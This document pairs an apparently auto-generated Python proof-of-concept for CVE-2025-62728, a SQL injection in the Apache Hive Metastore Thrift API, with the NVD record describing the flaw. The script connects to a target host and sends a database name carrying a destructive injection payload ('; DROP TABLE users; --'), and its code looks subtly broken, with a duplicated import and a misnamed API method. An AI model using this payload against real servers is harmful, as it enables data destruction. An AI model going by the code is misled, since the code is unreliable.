CVE-2025-62728

# CVE-2025-62728 Apache Hive Metastore SQL Injection PoC # Target: Apache Hive Metastore Server Thrift API # Note: This is for educational purposes only from thrift.transport import TSocket, TTransport from thrift.protocol import TBinaryProtocol from hive_metastore import ThriftHiveMetastore from hive_service import ThriftHiveMetastore def exploit_hive_sql_injection(target_host, target_port): """ Simulated SQL injection via delete_column_statistics API """ try: transport = TSocket.TSocket(target_host, target_port) transport = TTransport.TBufferedTransport(transport) protocol = TBinaryProtocol.TBinaryProtocol(transport) client = ThriftHiveMetastore.Client(protocol) transport.open() # Malicious payload for delete column statistics # In real attack, SQL injection would occur in the statistics deletion query malicious_db_name = "test_db'; DROP TABLE users; --" malicious_table_name = "test_table" malicious_column_name = "test_column" print(f"[*] Sending malicious request to {target_host}:{target_port}") print(f"[*] Database: {malicious_db_name}") # Attempt to trigger SQL injection result = client.delete_column_column_statistics( dbName=malicious_db_name, tableName=malicious_table_name, colName=malicious_column_name ) print(f"[+] Request sent, result: {result}") transport.close() except Exception as e: print(f"[-] Error: {e}") # Usage if __name__ == "__main__": # Replace with actual target TARGET_HOST = "192.168.1.100" TARGET_PORT = 9083 exploit_hive_sql_injection(TARGET_HOST, TARGET_PORT)

{"cve": {"id": "CVE-2025-62728", "sourceIdentifier": "[email protected]", "published": "2025-11-26T09:15:46.293", "lastModified": "2025-12-04T16:46:46.587", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SQL injection vulnerability in Hive Metastore Server (HMS) when processing delete column statistics requests via the Thrift APIs. The vulnerability is only exploitable by trusted/authorized users/applications that are allowed to call directly the Thrift APIs. In most real-world deployments, HMS is accessible to only a handful of applications (e.g., Hiveserver2) thus the vulnerability is not exploitable. Moreover, the vulnerable code cannot be reached when metastore.try.direct.sql property is set to false.\n\nThis issue affects Apache Hive: from 4.1.0 before 4.2.0.\n\nUsers are recommended to upgrade to version 4.2.0, which fixes the issue. Users who cannot upgrade directly are encouraged to set metastore.try.direct.sql property to false if the HMS Thrift APIs are exposed to general public."}, {"lang": "es", "value": "Vulnerabilidad de inyección SQL en Hive Metastore Server (HMS) al procesar solicitudes de eliminación de estadísticas de columnas a través de las API T.hrift. La vulnerabilidad solo puede ser explotada por usuarios/aplicaciones de confianza/autorizados a los que se les permite llamar directamente a las API Thrift. En la mayoría de las implementaciones del mundo real, solo unas pocas aplicaciones (por ejemplo, Hiveserver2) pueden acceder a HMS, por lo que la vulnerabilidad no es explotable. Además, no se puede acceder al código vulnerable cuando la propiedad metastore.try.direct.sql está establecida en false. Este problema afecta a Apache Hive: desde la versión 4.1.0 hasta la 4.2.0. Se recomienda a los usuarios que actualicen a la versión 4.2.0, que corrige el problema. Se recomienda a los usuarios que no puedan actualizar directamente que establezcan la propiedad metastore.try.direct.sql en false si las API Thrift de HMS están expuestas al público en general."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apache:hive:4.1.0:*:*:*:*:*:*:*", "matchCriteriaId": "40B6BA41-E7FC-4FFE-BEF8-62F1B668E8D1"}]}]}], "references": [{"url": "https://lists.apache.org/thread/yj65dd8dmzgy8p3nv8zy33v8knzg9o7g", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2025/11/26/3", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory"]}]}}